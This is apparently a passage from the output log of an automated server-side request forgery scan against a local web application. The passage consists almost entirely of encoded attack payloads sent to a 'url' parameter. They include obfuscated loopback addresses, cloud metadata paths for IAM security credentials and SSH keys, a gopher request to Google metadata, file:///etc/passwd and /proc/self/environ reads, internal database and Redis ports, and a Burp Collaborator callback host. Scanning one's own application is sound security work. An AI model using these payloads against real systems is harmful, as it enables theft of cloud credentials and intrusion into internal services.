`http://localhost:4200/api/activity_types?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/activity_types?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.1.3` +- Testing: `http://localhost:4200/api/activity_types?url=0` +- Testing: `http://localhost:4200/api/activity_types?url=127.1` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=localhost` +- Testing: `http://localhost:4200/api/activity_types?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/activity_types?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/activity_types?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/activity_types?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/activity_types?url=7F000001` +- Testing: `http://localhost:4200/api/activity_types?url=2130706433` +- Testing: `http://localhost:4200/api/activity_types?url=6425673729` +- Testing: `http://localhost:4200/api/activity_types?url=127001` +- Testing: `http://localhost:4200/api/activity_types?url=127_0._0_1` +- Testing: `http://localhost:4200/api/activity_types?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/activity_types?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/activity_types?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/activity_types?url=localtest.me` +- Testing: `http://localhost:4200/api/activity_types?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/activity_types?url=127.127.127.127` +- Testing: `http://localhost:4200/api/activity_types?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=0x7f000001` +- Testing: `http://localhost:4200/api/activity_types?url=017700000001` +- Testing: `http://localhost:4200/api/activity_types?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/activity_types?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/activity_types?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/activity_types?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/activity_types?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/activity_types?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/activity_types?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/activity_types?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254` +- Testing: `http://localhost:4200/api/activity_types?url=2852039166` +- Testing: `http://localhost:4200/api/activity_types?url=7147006462` +- Testing: `http://localhost:4200/api/activity_types?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/activity_types?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/activity_types?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/activity_types?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/activity_types?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/activity_types?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/activity_types?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/activity_types?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/activity_types?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/activity_types?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/activity_types?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/activity_types?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/activity_types?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/activity_types?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/activity_types?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/activity_types?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/activity_types?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/activity_types?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/activity_types?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/activity_types?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/activity_types?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/activity_types?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/activity_types?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/activity_types?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.0` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/activity_types?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/activity_types?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/activity_types?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/activity_types?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/activity_types?url=3232235521` +- Testing: `http://localhost:4200/api/activity_types?url=3232235777` +- Testing: `http://localhost:4200/api/activity_types?url=425.510.425.510` +- Testing: `http://localhost:4200/api/activity_types?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/activity_types?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/activity_types?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/activity_types?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/activity_types?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/activity_types?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/activity_types?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/activity_types?url=instance-data` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A22` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A443` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/activity_types?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/activity_types?url=loopback` +- Testing: `http://localhost:4200/api/activity_types?url=loopback%3A22` +- Testing: `http://localhost:4200/api/activity_types?url=loopback%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=loopback%3A443` +- Testing: `http://localhost:4200/api/activity_types?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/activity_types?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/activity_types?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/activity_types?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/activity_types?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/activity_types?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/activity_types?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/activity_types?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/activity_types?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/activity_types?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/activity_types?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/activity_types?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/activity_types?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/activity_types?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/activity_types?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/activity_types?url=127.1%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/activity_types?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/activity_types?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/activity_types?url=2130706433%2F` +- Testing: `http://localhost:4200/api/activity_types?url=3232235521%2F` +- Testing: `http://localhost:4200/api/activity_types?url=3232235777%2F` +- Testing: `http://localhost:4200/api/activity_types?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/activity_types?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/activity_types?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/activity_types?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/activity_types?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/activity_types?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/activity_types?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/activity_types?url=0%2F` +- Testing: `http://localhost:4200/api/activity_types?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/ +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/?url=127.1%3A80` +- Testing: `http://localhost:4200/?url=0` +- Testing: `http://localhost:4200/?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/?url=localhost%3A80` +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/?url=127.127.127.127` +- Testing: `http://localhost:4200/?url=127.0.1.3` +- Testing: `http://localhost:4200/?url=127.0.0.0` +- Testing: `http://localhost:4200/?url=2130706433` +- Testing: `http://localhost:4200/?url=017700000001` +- Testing: `http://localhost:4200/?url=0x7f000001` +- Testing: `http://localhost:4200/?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/?url=` +- Testing: `http://localhost:4200/?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/?url=` +- Testing: `http://localhost:4200/?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/?url=` +- Testing: `http://localhost:4200/?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/?url=` +- Testing: `http://localhost:4200/?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/?url=` +- Testing: `http://localhost:4200/?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/?url=google.com%40localhost` +- Testing: `http://localhost:4200/?url=localhost%23google.com` +- Testing: `http://localhost:4200/?url=google.com.localhost` +- Testing: `http://localhost:4200/?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/?url=` +- Testing: `http://localhost:4200/?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/?url=` +- Testing: `http://localhost:4200/?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/?url=` +- Testing: `http://localhost:4200/?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/?url=localtest.me` +- Testing: `http://localhost:4200/?url=http%3A%400%2F` +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/?url=2130706433%2F` +- Testing: `http://localhost:4200/?url=3232235521%2F` +- Testing: `http://localhost:4200/?url=3232235777%2F` +- Testing: `http://localhost:4200/?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/?url=127.0.0.1` +- Testing: `http://localhost:4200/?url=0x7f000001%2F` +- Testing: `http://localhost:4200/?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/?url=127.000000000000.1` +- Testing: `http://localhost:4200/?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/?url=0%2F` +- Testing: `http://localhost:4200/?url=127.1` +- Testing: `http://localhost:4200/?url=127.0.1` +- Testing: `http://localhost:4200/?url=localtest.me` +- Testing: `http://localhost:4200/?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: 